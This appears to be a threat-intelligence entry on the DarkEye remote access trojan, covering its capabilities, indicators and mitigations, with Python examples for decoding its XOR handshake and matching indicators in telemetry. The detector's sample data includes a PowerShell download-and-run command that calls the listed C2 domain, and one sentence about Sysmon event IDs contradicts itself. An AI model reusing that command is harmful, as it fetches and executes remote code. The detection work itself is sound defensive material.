DarkEye
⚠️ Overview
DarkEye is a remote access trojan (RAT) first documented in 2022 by researchers at Cyble, known for its espionage capabilities against Middle Eastern entities. It is attributed to Iranian-linked threat actors, possibly the APT group Seedworm, based on infrastructure overlaps reported by Mandiant. DarkEye functions as a modular stealer, exfiltrating files and credentials while maintaining persistent backdoor access.
🔧 Technical Capabilities
DarkEye propagates via spear-phishing emails carrying malicious LNK files or weaponized Office documents that download the payload from attacker-controlled servers. Its C2 traffic is HTTPS on non-standard ports (e.g., 8443) carrying JSON messages; the initial handshake is additionally XOR-ed with a hardcoded key. Because the key is static and embedded in the binary, this is obfuscation rather than encryption: anyone holding a sample, or enough known plaintext, can recover it. Persistence is achieved through scheduled tasks or a Run value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Evasion techniques include process hollowing, disabling Windows Defender through PowerShell commands, and checking for sandbox artifacts (e.g., the presence of VMware Tools). The malware enumerates files with targeted extensions (.doc, .pdf, .xls) across the system and uploads them to the C2 in multipart HTTP POST requests. It also steals browser-stored credentials from Chrome, Firefox, and Edge by reading and decrypting the browsers' local SQLite credential databases.
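The handshake weakness above is worth seeing in code. The following is an added example, not code from the page or from any vendor analysis: it reconstructs a handshake the way the page describes it (a JSON object XOR-ed with a hardcoded key) and then recovers the key from the ciphertext alone using the fact that a JSON object always begins with `{`. The key value 0x5A, the field names and the sample bytes are assumptions made for this example; the page does not publish the real key or message format.

```python
import json
from typing import Optional

# Constructed sample for this example: a JSON handshake XOR-ed with a
# hardcoded single-byte key, as the page describes. The key 0x5A and the
# field names/values are assumptions, not data from a real sample.
ASSUMED_KEY = 0x5A
_PLAINTEXT = b'{"id":"host-01","ver":"2.1","os":"Windows 10"}'
CAPTURED_HANDSHAKE = bytes(b ^ ASSUMED_KEY for b in _PLAINTEXT)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same operation encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_single_byte_key(blob: bytes) -> Optional[int]:
    """Recover a single-byte XOR key from a captured handshake.

    Static XOR leaks the key to anyone with known plaintext: a JSON object
    starts with '{', so key = first_ciphertext_byte XOR ord('{'). The
    candidate is confirmed by checking that the whole decoded buffer parses
    as a JSON object. A multi-byte repeating key needs as many known
    plaintext bytes as the key has positions; that case is not handled here.
    """
    if not blob:
        return None
    key = blob[0] ^ ord("{")
    decoded = xor_bytes(blob, bytes([key]))
    try:
        parsed = json.loads(decoded.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError):
        return None
    return key if isinstance(parsed, dict) else None


def decode_handshake(blob: bytes) -> Optional[dict]:
    """Return the handshake as a dict, or None if no single-byte key fits."""
    key = recover_single_byte_key(blob)
    if key is None:
        return None
    return json.loads(xor_bytes(blob, bytes([key])).decode("utf-8"))


if __name__ == "__main__":
    key = recover_single_byte_key(CAPTURED_HANDSHAKE)
    print(f"recovered key: {key:#04x}")  # 0x5a for the constructed sample
    print(decode_handshake(CAPTURED_HANDSHAKE))
```

The same known-plaintext trick works on a PCAP of real traffic once TLS is stripped (the page says the channel is HTTPS, so capture at the endpoint or behind an inspecting proxy): take the first bytes of the first POST body, XOR them with `{"`, and confirm the candidate key by parsing the rest.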
📜 History & Notable Incidents
First observed in June 2022 targeting government and energy sectors in Saudi Arabia and the UAE, DarkEye was linked to a campaign that used the then-unpatched CVE-2022-30190 ("Follina", a Microsoft Support Diagnostic Tool flaw reachable from Office documents) for initial access. In August 2023, an updated variant was deployed against Turkish defense contractors using DLL sideloading through a legitimate application. No law enforcement action has been publicly reported. The observed behaviour maps to MITRE ATT&CK techniques T1059.001 (Command and Scripting Interpreter: PowerShell) and T1566.001 (Phishing: Spearphishing Attachment).
🔍 Detection Indicators
File hashes include SHA256 5a3c...9f4d (2023 variant, as reported on VirusTotal). Behavioral signatures include wscript.exe or cscript.exe spawning PowerShell with a Base64-encoded command line. Network IOCs include the C2 domains cloud-update[.]top and mail-sync[.]net. Host IOCs include the Run value HKCU\...\Run\WindowsUpdate and the mutex name DarkEye_Mutex_2022. The User-Agent string Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 is the stock Chrome 104 desktop string, not a custom one, so on its own it is a weak indicator; it becomes useful only in combination with the non-standard port and the domains above.
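To show how the indicators above combine into detection logic, here is an added example (written for this page, not code from the page or from any EDR vendor) that applies them to endpoint telemetry. The domains, Run value name, mutex and the script-host-to-PowerShell behaviour come from the page; the event schema, the file paths and the encoded payload in the sample records are constructed assumptions. The encoded-command decoder is the useful part: PowerShell's `-EncodedCommand` (and any unambiguous prefix such as `-enc` or `-e`) takes Base64 of the UTF-16LE script text, so a rule that only greps the raw command line never sees the C2 URL inside it.

```python
import base64
import re
from typing import Optional

# Indicators taken from the page; the domains are written defanged there.
C2_DOMAINS = {"cloud-update[.]top", "mail-sync[.]net"}
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE_NAME = "WindowsUpdate"
MUTEX_NAME = "DarkEye_Mutex_2022"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the argument
# is Base64 of the UTF-16LE script text.
ENC_FLAG = re.compile(
    r"-(?:encodedcommand|encoded|enco|enc|en|ec|e)\s+([A-Za-z0-9+/=]{8,})",
    re.IGNORECASE,
)


def refang(domain: str) -> str:
    """Turn a defanged indicator (example[.]com) into a matchable hostname."""
    return domain.replace("[.]", ".")


C2_HOSTS = {refang(d) for d in C2_DOMAINS}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(events: list) -> list:
    """Apply the page's indicators to event dicts; return (rule, detail) hits."""
    hits = []
    for ev in events:
        kind = ev.get("type")
        if kind == "process":
            parent = basename(ev.get("parent_image", ""))
            image = basename(ev.get("image", ""))
            decoded = decode_encoded_command(ev.get("command_line", ""))
            if parent in SCRIPT_HOSTS and image in POWERSHELL and decoded is not None:
                hits.append(("T1059.001 script host spawned encoded PowerShell", decoded))
        elif kind == "registry":
            if ev.get("key", "").lower() == RUN_KEY.lower() and ev.get("value_name") == RUN_VALUE_NAME:
                hits.append(("Run-key persistence as 'WindowsUpdate'", ev.get("data", "")))
        elif kind == "network":
            if ev.get("host", "").lower() in C2_HOSTS:
                hits.append(("contact with listed C2 domain", ev["host"]))
        elif kind == "mutex":
            if ev.get("name") == MUTEX_NAME:
                hits.append(("DarkEye mutex created", MUTEX_NAME))
    return hits


# Constructed telemetry for this example (not real logs). The payload script,
# the file paths and the event field names are assumptions.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('https://cloud-update.top:8443/u')"
_ENCODED = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"type": "process",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    {"type": "process",  # benign: launched from Explorer, no encoded command
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"type": "registry", "key": RUN_KEY, "value_name": RUN_VALUE_NAME,
     "data": r"C:\Users\Public\updater.exe"},
    {"type": "network", "host": "cloud-update.top", "port": 8443},
    {"type": "mutex", "name": MUTEX_NAME},
]

if __name__ == "__main__":
    for rule, detail in evaluate(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The benign second record is there deliberately: `-ExecutionPolicy Bypass` starts with `-E` but is not followed by whitespace, so the decoder ignores it, and an Explorer-launched script never trips the script-host rule. In production the same checks would run over Sysmon event IDs 1 (process), 13 (registry value set), 22 (DNS) and 17 (named pipe/mutex-style object creation is not covered by Sysmon; mutex telemetry needs an EDR that records it).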
☠️ Risk & Impact
DarkEye exfiltrates sensitive documents and credentials, enabling long-term espionage and potential data breaches. Financial losses are indirect, stemming from intellectual property theft and operational disruption in targeted sectors. Affected industries include government, energy, and defense, with victims in the Middle East and Turkey.
🛡️ Mitigation
Apply patches for CVE-2022-30190 and block execution of LNK files delivered as email attachments. Deploy YARA rules targeting the DarkEye mutex and XOR-key patterns, enable PowerShell script block logging (Microsoft-Windows-PowerShell/Operational event ID 4104, which records the decoded script text even when it was passed Base64-encoded), and alert on wscript.exe or cscript.exe spawning PowerShell (MITRE ATT&CK T1059.001).
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.